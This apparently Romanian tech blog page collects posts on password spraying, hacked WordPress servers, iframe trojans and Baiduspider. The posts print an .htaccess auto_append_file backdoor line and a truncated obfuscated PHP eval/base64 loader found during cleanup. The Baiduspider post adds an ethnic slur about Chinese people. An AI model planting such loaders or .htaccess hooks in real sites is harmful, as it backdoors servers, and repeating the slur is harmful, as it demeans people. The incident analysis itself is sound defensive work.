Password spraying – aplicare de cosmetice in calculatoare

In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in a targeted account getting locked-out, as commonly used account-lockout policies allow 3-to-5 bad attempts during a set period of time. During a password-spray attack (also known as the low-and-slow method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise.

Email applications are also a target. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization’s email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire companys email address list, and/or (4) surreptitiously implements inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:

  • Use social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password spray
  • Using easy-to-guess passwords (e.g., Winter2018, Password123!) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
  • Leveraging the initial group of compromised accounts, download the Global Address List (GAL) from a targets email client, and perform a larger password spray against legitimate accounts
  • Using the compromised access, malicious actors attempt to expand laterally (e.g., via Remote Desktop Protocol) within the network, and perform mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:

  • A massive spike in attempted logons against the enterprise SSO Portal or web-based application. Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String). Attacks have been seen to run for over two hours
  • Employee logons from IP addresses resolving to locations inconsistent with their normal locations

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1] [ https://www.us-cert.gov/ncas/tips/ST04-002 ][2] [ https://www.us-cert.gov/ncas/tips/ST05-012 ]:

* Use SSO or web-based applications with federated authentication method
* Lack multifactor authentication (MFA)
* Allow easy-to-guess passwords (e.g., Winter2018, Password123!)
* Use inbox synchronization allowing email to be pulled from cloud environments to remote devices
* Allow email forwarding to be setup at the user level
* Limited logging setup creating difficulty during post-event investigations

Impact

A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

* Temporary or permanent loss of sensitive or proprietary information
* Disruption to regular operations
* Financial losses incurred to restore systems and files
* Potential harm to an organizations reputation

Solution

Recommended Mitigations

To help deter this style of attack, the following steps should be taken:
* Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols
* Review password policies to ensure they align with the latest NIST guidelines and deter the use of easy-to-guess passwords
* Review IT Helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT Helpdesk password procedures may not align to company policy, creating an exploitable security gap
* In addition, many companies offer additional assistance and tools the can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018 (link below):
https://cloudblogs.microsoft.com/enterprisemobility/2018/03/05/azure-ad-and-adfs-best-practices-defending-against-password-spray-attacks/

TA18-086A: Brute Force Attacks Conducted by Cyber Actors
U.S. Department of Homeland Security US-CERT
03/28/2018

WordPress 3.2.1 spart prin fisierele temei

Titlul este pompos ca in ziare si reviste. Pana la urma WordPress-ul a fost spart prin intermediul unei teme (theme, layout, sablon etc, cum ii zice fiecare). Aveam pe server mai multe teme gratuite oferite de mai multe site-uri (printre care si woothemes.com) si foloseam doar cateva dintre ele. Si prin una din ele, s-a putut intra si incarca pe server fisier cu cod PHP.

Orice programator mai rasarit – care mai face cracking, hacking – stie ca in momentul in care poti pune un fisier PHP pe un server, poti face multe pornind de acolo. Depinde ce doresti sa faci.

METODE

Am incercat sa astup groapa sapata de hacker si am folosit mai multe metode:

  • restaurarea fisierelor din back-up oferit de hosting
  • cautare de fisiere index.php si vizualizarea codului de la finalul fisierului
  • stergerea fisierelor ciudate de pe server (ex: Thumbs.db)
  • reinstalare de WordPress si alte site-uri
  • cautare de texte prin baza de date

.htacces
Blogurile dadeau un mesaj ciudat in burtiera:

PHP Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0
PHP Fatal error: Unknown: Failed opening required '/home/abcdefg/public_html/abcdefgh/Thumbs.db' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

Am reinstalat, am cautat si… nimic. Pana la urma hackerul se bagase in “.htaccess” si a adaugat linia de mai jos

php_value auto_append_file /home/abcdefg/public_html/abcdefg/Thumbs.db

deci degeaba cautam in codul php, caci era folosita metoda “auto_append_file”.

Succes la cei care au gropi de astupat!

Servere cu forumuri, wordpress-uri sparte de hackeri

In luna noiembrie 2011 am intalnit un server spart de hackeri. Pe scurt, fisierele index.php au fost editate si la final li s-a adaugat o linie lunga, ce contine urmatoarele linii (am taiat un pic din cârnații de caractere, pentru a nu pune codul în totalitate):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);
$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
}
*/

Codul de mai sus nu functioneaza impreuna cu inca un fisier – numit Thumbs.db – si situat in acelasi director. Exempu de cod din acest fisier:

eval(base64_decode("aWYgKCRldmFsSnlDZUxxSXN0WG9wdWggIT0gNjQ4NzIpIHtmdW5jdGlvbiBldmFsV3FmR0RMSk...
Continue reading

Buton Like de la Facebook, cu cod HTML gresit

In site-ul Facebook, in pagina de ajutor, exista instructiuni despre “Cum sa adaugi un buton Like la tine in site“. Numai ca codul HTML dat ca si exemplu de facebook.com este dat gresit: tagul iframe nu este inchis.

Cod gresit (de la Facebook):

<html>
    <head>
      <title>My Great Web page</title>
    </head>
    <body>
       <iframe src="http://www.facebook.com/plugins/like.php?href=YOUR_URL"
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"><iframe>
    </body>
 </html>

Pentru exemplul dat de ei, codul HTML corect este:

<html>
    <head>
      <title>My Great Web page</title>
    </head>
    <body>
       <iframe src="http://www.facebook.com/plugins/like.php?href=YOUR_URL"
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"></iframe>
    </body>
 </html>

Succes la modificat!

Goana SEO si cum poti sa iti frigi site-ul

Toata lumea e innebunita dupa SEO. “Vreau SEO” este pe buzele tuturor, “Vreau pe prima pagina”, “De ce nu apar o data?”.

Google este o firma privata, care te adauga dupa criterilor lor interne. La fel ca si Bing, ca si Yahoo si multe alte motoare de cautare. Doar ei cunosc formula de calcul si cum sa te pozitioneze. Cine ofera consultanta SEO, are o baza de cunostinte despre acest coeficient si poate forta repozitionarea prin aplicarea mai multor actiuni asupra site-ului.

La un client cu peste 1000 de vizitatori zilnici, am gasit multe referinte (referrer) in statistica, de la un site romanesc care genereaza trafic. Ceea ce nu stie clientul ca acest trafic este generat de roboti. Este bine ca traficul creste, fie el generat prin software manual.

Partea proasta este cand acest site generator de trafic, are virusi. Doar Google va sti daca va “parfuma” negativ site-ul clientului, daca generatorul de trafic este considerat “malware”. http://www.google.com/support/websearch/bin/answer.py?hl=en&answer=45449

La o analiza a site-ului generator de trafic, am gasit:
– foloseste “10 mii de statistici”: alexa.com, trafic.ro, statistics.ro, wta.ro, gtop.ro, extremetracking.com, google analytics
– include scripturi de la imvisible.ro, tradeads.eu si date-me.ro

Cand unele din aceste scripturi javascript sunt “hackuite”, site-ul tau va propaga hackingul, servind vizitatorului scripturi ce incerca tot felul de chestii: instalare de plug-in-uri, executie de java applet-uri, accesare de conturi paypal.com.

Firef0x-ul 3.6 a stiut sa ceara permisiuni de instalare si sa blocheze applet-urile, dar ce se face un user care si-a dat peste cap setarile de securitate? Se viruseaza si suna apoi un prieten.

exception: java.security.AccessControlException: access denied (java.util.PropertyPermision user.home read).

Succes la devirusat!

Despre virusul TrojanClicker Iframe

In ultimele luni a aparut un nou mod de hacking de site-uri: instalarea in ele de iFrame-uri, prin scripturi javascript. Ultima versiune pe care a trebuit sa o scot a fost TrojanClicker.Iframe.GT.gen trojan. Aceasta era instalat intr-un fisier index.php al unui site. Atacul de azi a venit din Singapore de la hostul 203.116.63.121

Ce modifica astfel de virus si cum se instaleaza in site?

Virusul modifica fisierele cu denumiri cheie: “index.php”, “login.php”, “index.html”, “config.php” etc.
Modificarea fisierelor se face prin download + modificare + upload prin FTP. Deci modifica parola de FTP daca esti virusat!

Ce trebuie sa faci ca sa scoti astfel de virusi dintr-un site?

  • schimba parolele de FTP. (Este o solutie pana la urmatoarea versiune de virus)
  • schimba parolele de MySQL. Daca aveau acces la FTP, deci pot citi si fisiere de configurare de la baza de date.
  • copiaza fisierele site-ului pe server dintr-un back-up. Daca nu ai back-up, fa-ti!
  • urmareaste log-ul de FTP pentru a gasi hostul de unde s-a instalat si blockeaza-l prin .htaccess
  • pune-ti intrebari de genul: “Cum de a aflat parola de FTP instalatorul virusului?”

Exemple ale actionarii virusilor de tip “IFrame”

– codul inserat exporta PDF-uri care exploateaza bug-uri ale Acrobat Reader-ului
– codul javascript deschide site-uri de cumparaturi
– functiile virusilor contin denumire de genul: “tmp_lkojfghx”, “base64_decode(‘aWYoaXNzZXQ”. Cauta toate fisierele care ar putea contine astfel de cuvinte si inlocuieste-le cu unele “curate”, dintr-un back-up.

China ataca prin roboti de indexare

Azi am gasit in statistici zeci de hosturi de genul 123.125.66.* si am cautat ce robot foloseste clasa aceasta. Este un chinez pe nume Baiduspider. Este suspectat ca ar fii japonez, cert este ca are ochii mici.

Baiduspider is a Baidu search engine automatic procedure. Its function is visits on the Internet the html homepage, establishes the index database, enables the user to search the expensive website in the Baidu search engine the homepage.

Why does baiduspider massively visit my homepage?
After baiduspider visits your homepage, can on the automated analysis each homepage writing content and the memory homepage website, then other 网友 can find your homepage through hundred search engines. If baiduspider does not visit your homepage, then possesses through baiduspider provides the homepage information the search engine all not to be able to find your homepage, in other words, other 网友 and so on several dozens search the website in hundred souhu.com Sina Yahoo! Tom to be able not to be able to find your homepage. You may arrive here further to understand the search engine.

Continue reading